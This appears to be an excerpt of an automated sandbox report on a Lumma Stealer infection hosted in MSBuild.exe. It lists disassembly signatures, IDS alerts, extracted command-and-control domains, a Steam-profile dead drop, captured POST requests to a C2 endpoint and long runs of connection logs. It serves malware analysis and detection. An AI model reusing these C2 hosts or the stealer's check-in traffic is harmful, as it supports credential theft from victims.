Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	2_2_00449B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esp+000006B8h]	2_2_0041DB6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h	2_2_0041DB6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	2_2_00413BE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esp+40h]	2_2_00411BEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_00430B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h	2_2_0042EC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	2_2_00427C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], A70A987Fh	2_2_0043FC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h	2_2_0042CCD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0042CCD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h	2_2_0042CCD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_00449CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh	2_2_00449CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp eax	2_2_0042AC91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [edx], ax	2_2_0042AC91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh	2_2_0042FD10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	2_2_0042DD29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_00448D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, word ptr [ecx]	2_2_0042AE57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00427E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_00425E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edi, ecx	2_2_00414E2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	2_2_00410EEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esp+40h]	2_2_00411E93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	2_2_00406EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+00h]	2_2_0040BEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	2_2_00416EBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp eax	2_2_00429F62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0043FF70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	2_2_00447FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_00447FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp ecx	2_2_00408FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp ecx	2_2_00445FD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [edx], 0000h	2_2_0041FFDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	2_2_00416F91

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49710 -> 104.21.53.8:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 104.21.53.8:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: exilepolsiy.sbs
Source: Malware configuration extractor	URLs: invinjurhey.sbs
Source: Malware configuration extractor	URLs: isoplethui.sbs
Source: Malware configuration extractor	URLs: exemplarou.sbs
Source: Malware configuration extractor	URLs: laddyirekyi.sbs
Source: Malware configuration extractor	URLs: bemuzzeki.sbs
Source: Malware configuration extractor	URLs: frizzettei.sbs
Source: Malware configuration extractor	URLs: wickedneatr.sbs

Source: Joe Sandbox View	IP Address: 104.21.53.8 104.21.53.8
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com

Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49758 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49761 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49763 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49764 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49805 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49824 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49823 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49825 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49826 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49827 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49833 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.6:49855 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: exemplarou.sbs
Source: global traffic	DNS traffic detected: DNS query: frizzettei.sbs
Source: global traffic	DNS traffic detected: DNS query: isoplethui.sbs
Source: global traffic	DNS traffic detected: DNS query: bemuzzeki.sbs
Source: global traffic	DNS traffic detected: DNS query: exilepolsiy.sbs
Source: global traffic	DNS traffic detected: DNS query: laddyirekyi.sbs
Source: global traffic	DNS traffic detected: DNS query: invinjurhey.sbs
Source: global traffic	DNS traffic detected: DNS query: wickedneatr.sbs
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: sergei-esenin.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com

Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2128545089.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2128545089.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=AeTz
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/api
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/b
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/q
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/r
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com:443/apifiles/76561199724331900
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000A88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000A88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: MSBuild.exe, 00000002.00000002.2127941885.0000000000A9C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2128545089.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
